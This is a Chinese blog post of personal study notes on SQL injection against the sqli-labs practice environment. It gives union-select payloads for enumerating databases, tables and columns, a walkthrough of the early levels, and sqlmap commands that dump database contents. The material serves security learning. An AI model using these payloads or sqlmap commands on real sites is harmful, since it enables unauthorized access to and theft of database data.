SQL注入

已于 2022-03-06 17:24:43 修改
阅读量3.2k 收藏 2
点赞数 2
文章标签: sql 数据库 mysql
于 2022-02-22 16:39:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Curry197/article/details/123065142
版权

目录

什么是sql注入?

怎么判断有没有sql注入

注入流程

Mysql的注释方式

常用函数,表名

常用参数

实例

sqli-lab

less-1

less-2

less-3

less-4

less-5

问题

什么是sql注入?

web应用程序对用户输入的数据的合法性没有判断,前端传入后端的参数是可控的,并且参数带入数据库查询,攻击者可以构造不同 sql语句来实现对数据库的任意操作。

两个条件:

1.参数用户可控:前端传给后端的参数内容是用户可以控制的

2.参数代入数据库查询:传入的参数拼接到sql语句中

怎么判断有没有sql注入

SELECT * FROM users WHERE id=1asdsadsad(随便输入) LIMIT 0,1

随便输入后对网页有影响说明带入数据库进行查询有注入点,没有影响说明没有带入数据库查询,出现404错误说明对输入检测   没有漏洞

注入流程

1.判断有没有SQL注入

2.判断数值型还是字符型

3.利用order by判断字段数

4.判断回显点 union select

5.爆破(要注意魔术引号问题)

Mysql的注释方式

 在构造sql语句url时,使用--+是因为在url中+号表示空格,不使用空格也可以--%20(也是空格的意思)

用#注释时则需要使用%23

常用函数,表名

常用参数

information_schema.tables:记录所有表名信息的表

information_schema.columns:记录所有列名信息的表

table_name:表名

column_name:列名

table_schema:数据库名

user() 查看当前MySQL登录的用户名

database() 查看当前使用MySQL数据库名

version() 查看当前MySQL版本

实例

先知道数据库名,猜出表名,在得出字段名,在出结果

利用order判断字段数

order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错

?id=1' order by 3--+

利用 union select 联合查询,将id值设置成不成立,即可探测到可利用的字段数

?id=-1 union select 1,2,3 --+

利用函数database(),user(),version()可以得到所探测数据库的数据库名、用户名和版本号

?id=-1 union select 1,database(),version() --+

利用 union select 联合查询,获取表名    

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='已知库名'--+

利用 union select 联合查询,获取字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='已知表名'--+

利用 union select 联合查询,获取字段值

?id=-1' union select 1,2,group_concat(已知字段名,':'已知字段名) from 已知表名--+

sqli-lab

less-1

首先,判断类型

构造?id=1'  发现没有报错,则不是数值型

判断字段数

?id=1 order by 3(只有小于等于字段数才不会报错,这里是按照表的第三列进行排序,大于字段数时表里没该列所以报错)

然后判断回显点(显示的是哪个字段的信息),利用union函数

?id=-1' union select 1,2,3 (合并两个或多个结果集,必须要相同数量的列,一般只显示一条数据,所以前面需要为错误值才会显示union函数的结果)

然后将回显点改成user(),database(),version()得出当前用户名,数据库,数据库版本

然后

利用 union select 联合查询,获取表名    

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='已知库名'--+

利用 union select 联合查询,获取字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='已知表名'--+

利用 union select 联合查询,获取字段值

?id=-1' union select 1,2,group_concat(已知字段名,':'已知字段名) from 已知表名--+

less-2

与less相似,去点 ’ (单引号)即可

less-3

 输入?id=1' 报错如下

 

less-4

会发现不管输入什么都能正确输出

 但是当输入id=1"时出现报错

 可以猜测id是被("id")包围

这里是对传进来的id进行了加功,”.“是连接符,也就是变成"id",再放到括号里面变成("id") 

less-5

问题

1.(concat,group——concat的区别)

2.魔术引号和php的问题

3.sql语句的执行,less-3,4

sqlmap简单使用

参考:

sqlmap 使用教程 - 简书

window sqlmap.py

kali sqlmap

1.判断是否有注入

sqlmap -u url?id=1

2.获取所有数据库名

sqlmap -u url?id=1 --dbs

3.获取当前数据库名

sqlmap -u url?id=1 --current-db

4.获取当前数据库所有表

sqlmap -u url?id=1 -D 数据库名 --tables

5.获取某个表所有字段

sqlmap -u url?id=11 -D 数据库名 -T 表名 --columns

6.获取字段值

sqlmap -u url?id=11 -D 数据库名 -T 表名 -C 列名 字段名 --dump

然后可以通过目录扫描,获取相应信息

如果遇到需要登录的情况则需要添加cookie

sqlmap -u "url?id=1" --cookie="可以抓包获取" --batch

 这里测试时如果url不加双引号则扫描不了

 加了--batch sqlmap不会询问你输入 全部默认确定

Curry197
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入详解
m0_67392811的博客
06-12 5616
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
sql注入攻击流量情况
07-18
sql注入攻击流量情况
小白入坑第三步-了解sql注入
wyj_1216 House
02-02 531
任务来袭: 使用phpstudy、sqllibs搭建注入环境 学会sqlmap基本用法 熟练掌握联合查询的注入方法 学习笔记 使用phpstudy、sqllibs搭建注入环境 1、先准备相应的phpstudy、sqllibs sqli-labs: https://github.com/audi-1/sqli-labs phpstudy: https://jingyan.baidu.com/ar...
sqli-labs 1~10关教程
jiji_king的博客
04-04 5628
sqlli-labs 1~10关教程 第一关 输入?id=1 出现如下图 输入id=1’ 出现语法错误 表示这里可能出现sql注入漏洞 进一步尝试 输入 id=1’ --+ 发现回显正常 用order by 判断该语句有几列数据 ?id=1’ order by 3 --+ order by 3 回显正常 order by 4 显示错误 证明有三列数据 具体解释见: 于是使用 函数查询,此时要将id=1改为一个数据库不存在的数值 比如888,给后面查询语句留显示位。此时注入语句为: ?id=
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 2928
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
sql注入中的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 8811
sql注入中的union联合查询,union select 1,2,3
sql注入,关于id=‘1 and 1=1‘
m0_55306747的博客
11-25 1万+
在做sql-labs靶场时,学到了,这个知识点很重要,当时发现这个问题困惑了我许久 正常的注入语句:select * from users where id = 1 select * from users where id = '1'也可以查询出和语句一相同的结果 select * from users where id = '$id' 令id=1" 语句变为select * from users where id = '1"' 此时引号正常闭合,按理说应当是查询users表中,id为1"的所有
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
SQL 注入天书.pdf
08-06
SQL 注入学习天书
SQL注入注入点找法
m0_67390969的博客
07-28 1729
2,交互点一般是搜索栏、留言版、登入/注册页面、以及最利于观察的搜索栏的地址如果类似于http//www.xxx.com/index.phpid=1这种很大程度存在注入当然有些注入点不会这么一眼看出会有些比较复杂例如http//www.xxx.com50006/index.phpx=home&c=View&a=index&aid=9这样的地址其实也可能存在注入。1,注入点首先观察搜索框的地址是否是有与数据库交互,例如html这种几乎是不存在注入的所以要先判断是否有交互。...
为什么sql注入的时候会写union select 1,2~~~~~from admin
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
sql注入基础总结
alickr的博客
06-29 1783
单引号注入 /?id=1' order by (一个数字)--+  遍历可以得到当前表的列数 /?id=-1' union select 1,2,3--+  得到1,2,3 /?id=-1' union select 1,2,concat_ws(char(32, 58, 32), user(), database(), version)--+  得到用户名,数据库名,版本号 /?i
SQL注入总结
CODING...
01-11 2761
最近一直在研究SQL注入攻击,现在对SQL注入进行一个总结: SQL注入的原理就不在这里赘述了,直接从攻击技巧开始: 1.手工注入猜解流程: 假设我们现在以http://ctf5.shiyanbar.com/8/index.php?id=1这个链接为例子,已知它的id是一个注入点: 我们可以大概知道它的SQL语句大概是这么写的:SELECT ID,CONTENT FROM TABLE WH
C#中int? id 和 id ?? 1
05-20 419
int? id 表示id是可以为null的整型 跟Nullable id 是一样的 .id ?? 1等于 id==null?1:id;
SQL注入-注入点判断
热门推荐
渗透笔记
01-11 2万+
1.注入点判断 传入SQL语句可控参数分为两类 1. 数字类型,参数不用被引号括起来,如?id=1 2. 其他类型,参数要被引号扩起来,如?name="phone" 判断某个链接是否存在SQL注入,可以通过对其传入的可控参数进行简单的构造,通过服务端返回的内容来判断有无注入 其他类型 构造测试 预期结果
寻找sql注入的网站的方法
u014796999的博客
11-14 1万+
方法一:利用google高级搜索,比如搜索url如.asp?id=9如下所示: (说明:后缀名为php的类似)
SQL数据库不用SQL语句能显示全表的内容_SQL注入是什么?如何防御SQL注入
weixin_40003767的博客
11-16 315
什么是SQL注入SQL注入SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。SQL注入漏洞可能会影响使用SQL数据库(如M...
sql注入sql注入
最新发布
05-02
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。攻击者可以利用这个漏洞来绕过身份验证、获取敏感数据、修改数据或者执行其他恶意操作。 为了防止SQL注入攻击,开发人员应该采取以下措施: 1. 使用参数化查询或预编译语句:这样可以将用户输入的数据作为参数传递给SQL查询,而不是将其直接拼接到查询语句中。这样可以防止恶意代码的注入。 2. 输入验证和过滤:对用户输入进行验证和过滤,确保只接受符合预期格式的数据。例如,可以使用正则表达式验证输入是否符合特定的模式。 3. 最小权限原则:确保数据库用户只具有执行必要操作的最低权限。这样即使发生SQL注入攻击,攻击者也无法执行敏感操作。 4. 错误处理:不要向用户显示详细的错误信息,以防止攻击者获取有关数据库结构和配置的敏感信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值